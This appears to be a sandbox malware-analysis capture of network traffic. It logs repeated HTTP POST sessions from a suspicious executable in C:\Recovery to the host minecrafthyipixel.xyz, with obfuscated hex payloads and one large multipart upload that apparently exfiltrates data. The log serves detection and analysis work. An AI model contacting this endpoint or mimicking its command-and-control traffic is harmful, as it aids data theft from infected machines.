                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vlPPjqsv422yecAhGT4XeJTXtNvXwwIR0V2gxRa1ULqGEvSNvo4r1CdYF6FfrAWLTIWV2xLkFHWeU9j9aTtxLrIC1GQd2rsg5VLK3VVGlzzb%2FGUSz9DSTzhH%2FwNdV5zruzweNwm8rz0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1c1fadaada0-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
Apr 19, 2024 13:42:33.711503029 CEST | 678 | IN | Data Raw: 6d 58 62 58 7d 6c 72 5f 7a 5c 79 05 5c 07 0f 7d 62 60 67 7b 5a 4c 7e 4a 78 59 75 5d 63 62 72 5f 61 66 68 09 7e 6f 66 58 77 42 6f 58 7e 73 77 5f 6f 52 5d 02 7a 63 66 01 6b 0b 74 0a 77 49 70 03 69 4c 6e 0a 7a 53 59 51 61 7e 5b 43 6a 6e 54 40 50 73
                                                                                                                                    Data Ascii: mXbX}lr_z\y\}b`g{ZL~JxYu]cbr_afh~ofXwBoX~sw_oR]zcfktwIpiLnzSYQa~[CjnT@PsRkoNP|wx}I_Y{}|^{qZ|XwK}Y{A|NrSn``O~[pKt]rRyav[xVK{YjeO[~d]SaSQ^eAReoBWt{q\_Nu_}|f~A}Z{@qXV\WzCWc\CT_^WkkS]XcasHT`aVs|Zzp]ia@Z}c^RoTQ^gVSb
Apr 19, 2024 13:42:33.711541891 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0
Apr 19, 2024 13:42:33.880670071 CEST | 361 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 376
                                                                                                                                    Expect: 100-continue
Apr 19, 2024 13:42:33.985332012 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:42:33.985574007 CEST | 376 | OUT | Data Raw: 57 5f 5e 5c 59 44 51 58 5c 5e 59 59 57 57 58 5b 54 51 5f 57 54 5e 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W_^\YDQX\^YYWWX[TQ_WT^SX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\%.>U",]3(0*>^'':,U1(*7!=+#,,.%$[. X -
                                                                                                                                    Apr 19, 2024 13:42:34.261830091 CEST | 774 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:34 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hmLF5kNbZy02py69BrJklgd8U0FfdfE2EBxGY%2Bkukco0PJ9u7zkO7JvJvf4qrc2U%2BLnt%2FHb7jTd76tEZ9J5p%2FUjhvd%2FI3wCKWkWsiUjuPZaxJ8aPPpEK%2B1lIfwcJYG65OHAIQ6gq694%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1c61f60ada0-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 24 1a 30 35 35 05 36 39 20 00 29 33 2e 5a 3d 09 21 5e 29 29 31 5d 20 2d 16 52 3b 3a 2c 5c 3f 15 2e 5d 31 23 03 1a 26 3d 24 51 25 30 21 59 00 1a 39 1b 23 2c 35 10 2d 17 21 58 2b 21 2e 00 20 31 3b 5c 2b 2d 2e 0b 34 3b 30 03 3f 10 07 1b 2f 28 38 15 3c 3b 22 02 2f 27 31 06 21 3b 2c 52 09 12 25 1a 2a 2b 38 5f 31 30 26 08 34 08 3c 10 28 3f 35 05 27 2b 0e 56 25 20 2b 06 2e 0b 39 08 31 00 07 1e 2a 2a 01 0f 22 3c 3d 56 32 04 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98$05569 )3.Z=!^))1] -R;:,\?.]1#&=$Q%0!Y9#,5-!X+!. 1;\+-.4;0?/(8<;"/'1!;,R%*+8_10&4<(?5'+V% +.91**"<=V2.^,+H0TW
                                                                                                                                    Apr 19, 2024 13:42:34.261862040 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0
                                                                                                                                    Apr 19, 2024 13:42:34.300662994 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 1876
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:42:34.405599117 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:34.405795097 CEST | 1876 | OUT | Data Raw: 52 59 5e 59 5c 40 51 58 5c 5e 59 59 57 54 58 5a 54 56 5f 5b 54 54 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RY^Y\@QX\^YYWTXZTV_[TTS_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%&>R!8]3 7'8)='Y%+&8- .T*]4'/5$[. X )
                                                                                                                                    Apr 19, 2024 13:42:34.682418108 CEST | 772 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:34 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KzL7FGlq8OFYhfxrpZ54wIZVwOBK%2Bs4kEU455EF3D15Dnssy4bgSTVOdR5BqLR8HHF%2Fq37ryNB%2BaPM6caDUc0IqUjqN1fig3ysz7oY3dJ7wTnUKJ2GkK7ER%2BpND6K97QPOQTZ%2BYVmr8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1c8b9b4ada0-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 24 1a 27 36 21 06 35 3a 24 02 29 30 22 5f 3d 09 3a 03 3d 29 26 04 23 2d 19 0e 3b 3a 37 00 3c 5d 2d 04 25 0d 00 0e 30 5b 27 0f 25 20 21 59 00 1a 39 5d 23 5a 31 58 2e 07 39 5a 3f 32 31 12 23 0b 3f 5c 3c 3d 2d 50 23 01 3f 15 2b 00 22 0b 2d 28 3b 0e 28 06 07 5a 3b 19 29 04 36 11 2c 52 09 12 26 0d 3f 2b 3c 10 32 33 3e 09 22 21 06 59 28 3c 2a 10 33 3b 20 1c 26 55 2b 07 2d 0c 3e 55 31 10 25 1f 2a 5c 3f 0a 23 02 21 52 26 14 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98$'6!5:$)0"_=:=)&#-;:7<]-%0['% !Y9]#Z1X.9Z?21#?\<=-P#?+"-(;(Z;)6,R&?+<23>"!Y(<*3; &U+->U1%*\?#!R&.^,+H0TW
                                                                                                                                    Apr 19, 2024 13:42:34.682482958 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    1 | 192.168.2.4 | 49740 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:42:34.038744926 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:42:34.143064976 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:34.143234015 CEST | 2512 | OUT | Data Raw: 57 58 5e 5a 59 47 54 5b 5c 5e 59 59 57 56 58 59 54 52 5f 59 54 5d 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WX^ZYGT[\^YYWVXYTR_YT]S[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%%2V"[&0 3;!?( 2*$U1+#2!* 7/0:$[. X !
                                                                                                                                    Apr 19, 2024 13:42:34.498954058 CEST | 623 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:34 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qX6zWXy07TToBq%2FD7xjxb2xPp4jWkRcszWCM0%2B8tk%2BytRBgX7HzXAj3GKJi1sxyCX8D6LbOScQPjzzWYUpTcK0VbVioVkGBr4%2FhN5y92ZFAgxRU%2BkxC4u7n0TOWxLDTM3kIbXXckCx0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1c718af4552-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:34.499017954 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    2 | 192.168.2.4 | 49741 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:42:34.726541042 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:42:34.830943108 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:34.831384897 CEST | 2512 | OUT | Data Raw: 57 58 5b 5e 59 45 54 59 5c 5e 59 59 57 54 58 59 54 54 5f 5c 54 5a 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WX[^YETY\^YYWTXYTT_\TZSZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%^'=164& 06>&<S&72=#Z ].5$[. X )
                                                                                                                                    Apr 19, 2024 13:42:35.172565937 CEST | 623 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:35 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FSYDEPylVKKVSG0VHFDc%2F7h0RFd%2FKGqU1rBV2B2qizuZoX7JOgvbc9F8E2sQGO10jhabb6nBlD9kutMGXI4pnKWAIG3n%2BoWNrCWH7cdDVXzDctstlWjufcswX6yBS1IDbh%2Bkb8nADDo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1cb6eac7b94-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:35.172627926 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    3 | 192.168.2.4 | 49743 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:42:35.752336979 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:35.858709097 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:35.859002113 CEST | 2512 | OUT | Data Raw: 57 58 5e 58 59 4b 54 59 5c 5e 59 59 57 50 58 5d 54 5a 5f 59 54 5b 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WX^XYKTY\^YYWPX]TZ_YT[SV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%^&=6T6$'35V?8')(V&]*R#");"<<.5$[. X
                                                                                                                                    Apr 19, 2024 13:42:36.223082066 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:36 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z0d1u3L4gDoB6WD25c%2BFcQubB5LyhHaHgv99U3p%2FVpsP6p6BmYyX%2B5ZBxYKpOwEiRP8GltK9oSd3rK9WvTEumMIdnvRE4EGKdlAUUlWNmVtC%2BXxuauqOqIddWcWTsAK3UJM27U4QZPs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1d1ce3c4554-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:36.223144054 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    4 | 192.168.2.4 | 49744 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:42:36.556998968 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:42:36.661571980 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:36.661927938 CEST | 2512 | OUT | Data Raw: 57 54 5e 5b 59 43 54 55 5c 5e 59 59 57 54 58 52 54 51 5f 56 54 5a 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WT^[YCTU\^YYWTXRTQ_VTZS[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&1>V";$Z$ '+P*8'&'%+. "2)7 ,(\-%$[. X )
                                                                                                                                    Apr 19, 2024 13:42:37.047378063 CEST | 623 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:36 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P7ioUBMzDT%2B7iVTAZTI%2BEsdr2U0mg7GMhrRrc8jCaRmqrFgdkbozQhSa%2B1grNqxpsTcbRe6JO%2FaxUL1NG45Izmyh3Sl%2FCOc8nrpDKkwsPsiY6NGZ3FUxHZRvLR9Bc5Z7wkFImBCQgC4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1d6da861d66-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:37.047442913 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    5 | 192.168.2.4 | 49747 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:42:37.291600943 CEST | 432 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: multipart/form-data; boundary=----SKVkDmmIXvVPlbJZk2vuH9rP9KPHZ1VSvi
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 147982
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:42:37.396292925 CEST  25                 IN         HTTP/1.1 100 Continue


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.4  49748        104.21.57.61    80                6756  C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 13:42:37.369956970 CEST  386                OUT        POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:42:37.474834919 CEST  25                 IN         HTTP/1.1 100 Continue
Apr 19, 2024 13:42:37.474993944 CEST  2512               OUT        Data Raw: 52 5d 5b 58 59 45 51 58 5c 5e 59 59 57 51 58 52 54 54 5f 5d 54 5e 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R][XYEQX\^YYWQXRTT_]T^SY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&>* +?'0'><&<S1+5 1>*+# 8]9$[. X =
Apr 19, 2024 13:42:37.821958065 CEST  623                IN         HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:37 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d1AapU2v5p3tt9B6JVQrv0p8pv9Im29iBQAVHO39kx6nYL3TxKEcQ5aXbWmlRvpS1n%2B4SrJQB%2BNWA3nAM%2BfmtZSMP7hoS%2Bs6rjp4xwhJs%2F62amjwlKBpbRmVFEs4VZkbnjIRwBCN9Yk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1dbe91cb0dc-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:42:37.822020054 CEST  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.4  49751        104.21.57.61    80                6756  C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 13:42:38.147696972 CEST  386                OUT        POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:42:38.252191067 CEST  25                 IN         HTTP/1.1 100 Continue
Apr 19, 2024 13:42:38.252365112 CEST  2512               OUT        Data Raw: 52 58 5e 5a 59 46 51 5d 5c 5e 59 59 57 5f 58 5f 54 51 5f 57 54 58 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RX^ZYFQ]\^YYW_X_TQ_WTXSZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\1=2U"+$35?(+%9T%;=#>87]"/,.$[. X
Apr 19, 2024 13:42:38.599740982 CEST  613                IN         HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:38 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
